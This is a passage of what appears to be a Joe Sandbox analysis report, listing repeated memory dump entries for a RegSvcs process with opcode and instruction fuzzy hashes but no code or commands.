                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                        • Instruction ID: b5bf0fa278fe4f8b76c6684a5bc274d0b7e82616b51d787de2e1ed27bbaef121
                                                                        • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                        • Instruction Fuzzy Hash: 7E517E75A00215CFCB15CF59C480AAEFBB1FF84710F2881AAD915EB361D770AE42CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 347dc5a723645e59dedc5e75ba355522297e0888c290f7f06f5f18bbc7ebfe9b
                                                                        • Instruction ID: 9341e5536894cbcc3bd3cac4ced69abc9dddc1ec8155343d6980511ca709c908
                                                                        • Opcode Fuzzy Hash: 347dc5a723645e59dedc5e75ba355522297e0888c290f7f06f5f18bbc7ebfe9b
                                                                        • Instruction Fuzzy Hash: 65510870900226DBEB26AF28CC40BA9B7B1FF25314F1542ABD925973E1DB7499C1CF90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4e7129b216425a8f01b5f6c30e9f587253278b9c26685229aba02031d6d5f97f
                                                                        • Instruction ID: e1fd427e8b1f31559997fbcb1b728a46663a9ca277cfe888fa4ebb07085597f0
                                                                        • Opcode Fuzzy Hash: 4e7129b216425a8f01b5f6c30e9f587253278b9c26685229aba02031d6d5f97f
                                                                        • Instruction Fuzzy Hash: AF41C271A002299BDB21DF29C940BEA77B8AF59700F4100ABE908AB361D774DE81CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: daa5003547e808211d5c3733bf25172dd585bd295d0b19c33876551c6abff58a
                                                                        • Instruction ID: 47cfb2603e55237c02d230699cfe955d247e031e6ddebe0ccf6b80da26d43326
                                                                        • Opcode Fuzzy Hash: daa5003547e808211d5c3733bf25172dd585bd295d0b19c33876551c6abff58a
                                                                        • Instruction Fuzzy Hash: 9D41E4716003249FEB22DF25CC40FABBBE9AB65654F40049BF9459B2A1D770EDC4CB52
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                        • Instruction ID: 8a238c20c994d383c5668967b7e8655a4efe9d36095fec865efddc6b4a0798b8
                                                                        • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                        • Instruction Fuzzy Hash: 3B419675B00107ABDF15DFA9CC88AAFBBFAAF94601F14406AE944A7361D670DD11CB50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: edb0b1db513ad8980d53beb281ba49c2ba303e0230cf38a0a802df9483e736bd
                                                                        • Instruction ID: 2bbbe4ee7b271c97f5236cc571187a3461805968ae0d9c060ccae3871ee6e37d
                                                                        • Opcode Fuzzy Hash: edb0b1db513ad8980d53beb281ba49c2ba303e0230cf38a0a802df9483e736bd
                                                                        • Instruction Fuzzy Hash: 4541B1B16007119FE325CF29C480A23B7F9FF99314B544A6FE55787A60E770E886CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cfa6bbe05b0a229848395c8ad8c02851ec4b61662f68493760ed8cf14bdab30f
                                                                        • Instruction ID: 34b13fd6c932e1694df70cc4660bb79eea68bbb90486d61a94d7123506e0df49
                                                                        • Opcode Fuzzy Hash: cfa6bbe05b0a229848395c8ad8c02851ec4b61662f68493760ed8cf14bdab30f
                                                                        • Instruction Fuzzy Hash: BA41C432980205CFEB21DF68C554BEE7BB0FB58314F25016BD422BB3A5DB349945DB94
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0280301313aa696977fee476fb2e8de8393c7cd8bd41cbd68b781a7a9d5cc3c1
                                                                        • Instruction ID: 5ee280d2fd9461dcc8a677eb5512463eb3206580be739d8a5fb948d3ac259861
                                                                        • Opcode Fuzzy Hash: 0280301313aa696977fee476fb2e8de8393c7cd8bd41cbd68b781a7a9d5cc3c1
                                                                        • Instruction Fuzzy Hash: CC410271900212CBD7259F5AC880A6EBBF1FBA8714F55802FD9219B365C775D886CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cde00edd5a3b1f3fb7cca5e971f07674ef3e207cc66dcc5849eb7721064dfe5a
                                                                        • Instruction ID: 85e530bb36896a45b9193e5b68b0da5aa9e3e06c18f13ffe6251cc06228c1c2a
                                                                        • Opcode Fuzzy Hash: cde00edd5a3b1f3fb7cca5e971f07674ef3e207cc66dcc5849eb7721064dfe5a
                                                                        • Instruction Fuzzy Hash: D64129715187469FE312DF698840AABF6E9EF98B54F40092FF984D7260E730DE058B93
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                        • Instruction ID: e562bb11a6bd45a022f82027be34d5e35d0bbd89a940423d806f367516dac3bb
                                                                        • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                        • Instruction Fuzzy Hash: 0A418A71A01251DBDB21DE2D84607FBBFB1EBA0B54F25806BE945CB368D6338D80CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 153c12d01101ae45583c9393fd5c60a3a3529f0513dbb36b6855e9888eadcc81
                                                                        • Instruction ID: c2687beb0b063ccefb8493f12212b92dfded8171ede72cc89f03cf07949c1d37
                                                                        • Opcode Fuzzy Hash: 153c12d01101ae45583c9393fd5c60a3a3529f0513dbb36b6855e9888eadcc81
                                                                        • Instruction Fuzzy Hash: C4415971601611EFD721DF19C840B66BBF4FF68314FA4866BE449CB361E771E9828B90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                        • Instruction ID: f18817607a1cae3885bb4fd32f235fd83ada6692f2a427ed5a3843d6dd7686ba
                                                                        • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                        • Instruction Fuzzy Hash: 67413975A00605EFDB64CF99C980EAABBF4FF18704B10496EE956D7261D330EA44CF50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 66cf9739765631d2e49872a8b1648b01a74761b6e8a3f12155b008e2f8068c28
                                                                        • Instruction ID: a2269e1d6ff426457d57d596b53d214d4bceaf68d5657af5dd51bafb2959e231
                                                                        • Opcode Fuzzy Hash: 66cf9739765631d2e49872a8b1648b01a74761b6e8a3f12155b008e2f8068c28
                                                                        • Instruction Fuzzy Hash: A0418D71505711DFC722EF29C940A55B7F1FFA4320F5185AFC41A9B2B1DBB09981CB51
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7fb9755aa26f0d0b0e829d80e11425ded4e6e2f6d635cb16e4315b6d45f1f166
                                                                        • Instruction ID: 4ea16118a103ffba5933521cfc5c88003db5b0fcc96ea14a4c9c55112f83b7ca
                                                                        • Opcode Fuzzy Hash: 7fb9755aa26f0d0b0e829d80e11425ded4e6e2f6d635cb16e4315b6d45f1f166
                                                                        • Instruction Fuzzy Hash: 343158B1A00345DFDB52CF68C480B99BBF4EB19724F2185AED519EB362D3329902CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fdeef7d3dc2a4aca7876d8bd8a7036fef32c6e50088dc2ea9bacd989cb264da2
                                                                        • Instruction ID: 9fcd56dc880fcc8e245826dd0d7fb8b5ea7d74fcf6d33a7f808b73f33db480c8
                                                                        • Opcode Fuzzy Hash: fdeef7d3dc2a4aca7876d8bd8a7036fef32c6e50088dc2ea9bacd989cb264da2
                                                                        • Instruction Fuzzy Hash: DB41AC719083019BD721DF29C844B9BBBE8FF98714F414A2EF9A8D72A1D770D905CB92
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 91e35fa663782f019ba40f92606369a40d9779fdb5c262164b066f17404a9db6
                                                                        • Instruction ID: 3e2e7fb62ff6d902dbbb3bb8f1b9d2bc73e0a953415e30d11836f59a2c74399d
                                                                        • Opcode Fuzzy Hash: 91e35fa663782f019ba40f92606369a40d9779fdb5c262164b066f17404a9db6
                                                                        • Instruction Fuzzy Hash: 6C41D3725086419FC320DF29D840A6BB7E9BFE8704F55061EF998877A0E730D914C7A6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 529b766b5178ef031d566bd44e2a4ea5d05fcdf8eed1873b31997412561e13d8
                                                                        • Instruction ID: 80cd05169bce823e4f900e790d9df30dda49b313d2eee7bd1c84c2d3c61b6d29
                                                                        • Opcode Fuzzy Hash: 529b766b5178ef031d566bd44e2a4ea5d05fcdf8eed1873b31997412561e13d8
                                                                        • Instruction Fuzzy Hash: E341C0313003228BD725DF29D894B2BBBE9EF94360F58442EE6558B3B1DB70D985CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                        • Instruction ID: 316951b7ff04eca8ad4d092e92b888a046490d5d002a3add25d50c0aa9314cb6
                                                                        • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                        • Instruction Fuzzy Hash: F8312731A04245AFDB229B69CC40B9FBFE8AF68750F04426BF455D7362C7B49885CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3a0f6c8aeb0c5649b34d19e8eeb829f165b4025210de3ed04d00febdc6e52123
                                                                        • Instruction ID: 0f507bd14f5aac56734cae0f503a5ea8b7374de74ffb1ae10bbfb88758aa66b6
                                                                        • Opcode Fuzzy Hash: 3a0f6c8aeb0c5649b34d19e8eeb829f165b4025210de3ed04d00febdc6e52123
                                                                        • Instruction Fuzzy Hash: FD319835740716ABE7229F568C41F6BBAA8AB59F50F10003EF600BB3A1DBB4DC0187A4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eff831578098e7c7bf6ea21a19d79c557e75a72dead134bd6cee6b8155ac5ad0
                                                                        • Instruction ID: 55d75c56a7e4bf17941e9e931028b2ebe03b77ac47487b53b9a0b58db7aa1059
                                                                        • Opcode Fuzzy Hash: eff831578098e7c7bf6ea21a19d79c557e75a72dead134bd6cee6b8155ac5ad0
                                                                        • Instruction Fuzzy Hash: FF418F31200B45DFD722DF29C491BDB7BE9EB59754F05482EE6598B360C7B4E848CB50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d4dc8bb00ba671041075334ae517dd354d9cdc434214009dbdb4b94a83dae030
                                                                        • Instruction ID: b9fc6ddb3401854c554097d786d509b15a8b010f0feafaa821b1b5ed14170edd
                                                                        • Opcode Fuzzy Hash: d4dc8bb00ba671041075334ae517dd354d9cdc434214009dbdb4b94a83dae030
                                                                        • Instruction Fuzzy Hash: C331C4312416C29BFB22DB5DC948B267FD8BB54744F1D04A6AB85AB7F2DB38D841C220
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a2eeafefab9f71f406085f0449eae680459c466f34a386d1d71cf09d344b592c
                                                                        • Instruction ID: 8cd5b87866c9209ed65100fda55924b30637419205c691163284cb58b854a6b9
                                                                        • Opcode Fuzzy Hash: a2eeafefab9f71f406085f0449eae680459c466f34a386d1d71cf09d344b592c
                                                                        • Instruction Fuzzy Hash: 3531E475A00116EBDB15EF98CC44BAEB7F9FB58741F46416AE900AB254D770ED00CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 726c8c2d0743479f2bd8043de06baec142a30732b8ad3c2e62ba33a99040f592
                                                                        • Instruction ID: 2c5a148407c2790092a8b8000e31069c459fe123085e236df55bf2f5eb717460
                                                                        • Opcode Fuzzy Hash: 726c8c2d0743479f2bd8043de06baec142a30732b8ad3c2e62ba33a99040f592
                                                                        • Instruction Fuzzy Hash: 71316776A4012DABCF61DF55DD54BDE7BF9AB98710F1400AAE508A7260CA30DE91CF90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c38cd4d36016f631c96adf868bcaaac919d5ba087e31a0c8099b0f65759d8f5a
                                                                        • Instruction ID: 3e4f3fd253e6b5c143634f5d61d927132be435bb2181519d9838a0d4b4656b19
                                                                        • Opcode Fuzzy Hash: c38cd4d36016f631c96adf868bcaaac919d5ba087e31a0c8099b0f65759d8f5a
                                                                        • Instruction Fuzzy Hash: 4B31C972E00655AFEB21DFA9CC40AAFBBF8FF54750F11442BE516E7260D2749E018BA0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 12737d07548b1cb3f8afaf9623cb565b20675190f6b48aa5d560e06a6ca4da14
                                                                        • Instruction ID: 298b2db2cdbbbedcd9605969304d67d67575be1657e349c3d42f53af7894b108
                                                                        • Opcode Fuzzy Hash: 12737d07548b1cb3f8afaf9623cb565b20675190f6b48aa5d560e06a6ca4da14
                                                                        • Instruction Fuzzy Hash: A831F671640212EBDB13DF9AC854B6FB7F9AFA4315F02006EE505DB362DA70DD018790
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6b3a60412391e5241ed8fa4e9f3fda8937946d22b00a63e839f6d4255a36dea2
                                                                        • Instruction ID: 6f7a29c10368985ff245d6db31371383f1fc463a80780d3921f33860012e7a0a
                                                                        • Opcode Fuzzy Hash: 6b3a60412391e5241ed8fa4e9f3fda8937946d22b00a63e839f6d4255a36dea2
                                                                        • Instruction Fuzzy Hash: 73310876A04722DBC722DE298880D6B7BE5AFE4650F42452FFD55A7330DA70DC4187D1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef6366ca9fde3134beacfb3c8ca30bb00fe2a443b86038a15edf8912b9dd9e72
                                                                        • Instruction ID: 3e2ddbb070d55e4f42564a58bd1c4c374a949374b2ce950afcd2c8a2d0a5d44f
                                                                        • Opcode Fuzzy Hash: ef6366ca9fde3134beacfb3c8ca30bb00fe2a443b86038a15edf8912b9dd9e72
                                                                        • Instruction Fuzzy Hash: 2A3181B26053128FE721DF19C840B1BBBE5FB98700F45496EEA8497761D7B0E885CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                        • Instruction ID: 48529a652b115c9afc02a5f713c414e04681b918121414784e927e6bf86f8201
                                                                        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                        • Instruction Fuzzy Hash: 7F312DB2B00B01AFD761CF6ADD41B57BBF8BB18650F14052EA99AC7761E630E900CB60
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e8bad1134d3ce93f144d5b6cebeeb6eba4438c2e35702770e24588776268c9e6
                                                                        • Instruction ID: 4fddbf608da20555c2e1130821a5d4ef70216041a6707510b7397dc67c3abc7f
                                                                        • Opcode Fuzzy Hash: e8bad1134d3ce93f144d5b6cebeeb6eba4438c2e35702770e24588776268c9e6
                                                                        • Instruction Fuzzy Hash: C131CD75509301CFC712DF1AC54081ABFF1FF99A18F4449AEE488AB361D330DA45CB92
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fffdca62f76573740a371e793a368fd2e0a219efb8c18cd00395b0f66c7de350
                                                                        • Instruction ID: a8d1edf2703930743d42f97ee739f3a9716d562f46eaf70fb3ba2ffa1aa1ef1d
                                                                        • Opcode Fuzzy Hash: fffdca62f76573740a371e793a368fd2e0a219efb8c18cd00395b0f66c7de350
                                                                        • Instruction Fuzzy Hash: 8231F432B002059FE720EFA9C981B6EBBF9EB94304F04843BD515D7260D730D946CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                        • Instruction ID: 27c33c7082fd01f3215f1356e5e03fe13ac9ce4f3a6cf22ba6b0cc1926220244
                                                                        • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                        • Instruction Fuzzy Hash: 06210436E4125AAADB10DFB98841BEFBBB5AF54740F198037AE15E7360E270CD0187A0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d98e9156f7790f0fe0fdb4ec18f6c90e91fe884f847eab08caa1e52dcec93266
                                                                        • Instruction ID: 068ed8555ee1964eb70fe27ebbdf9e3dc052e4e335fb15a693e30879fae9cd39
                                                                        • Opcode Fuzzy Hash: d98e9156f7790f0fe0fdb4ec18f6c90e91fe884f847eab08caa1e52dcec93266
                                                                        • Instruction Fuzzy Hash: 6C3170B19002118BD731AF58CC40BF9B7B4EF94314F44816FD94A9F3A6DA74D986CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                        • Instruction ID: 20a675dc2303af720d328645cef3d8a71ba94292ad3dd3737c0e95a17f70edc5
                                                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                        • Instruction Fuzzy Hash: 9D214F36600652B7CF15AB968C50EBBBBB5EF60710F40802FFA958B6B1E634D944C360
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e03b2163cd6908561d5d08ac9dedd2540df18771d70edace84f27ee89198597
                                                                        • Instruction ID: 375f66ab77db343a3abbd0d7b31115485ed69d645f5c8f4e73110eaae912058d
                                                                        • Opcode Fuzzy Hash: 3e03b2163cd6908561d5d08ac9dedd2540df18771d70edace84f27ee89198597
                                                                        • Instruction Fuzzy Hash: ED31FC35A4011C9BDB32DF19CC41FEEB7B9EB25750F0101A6EA45B72A0D6749E818F90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
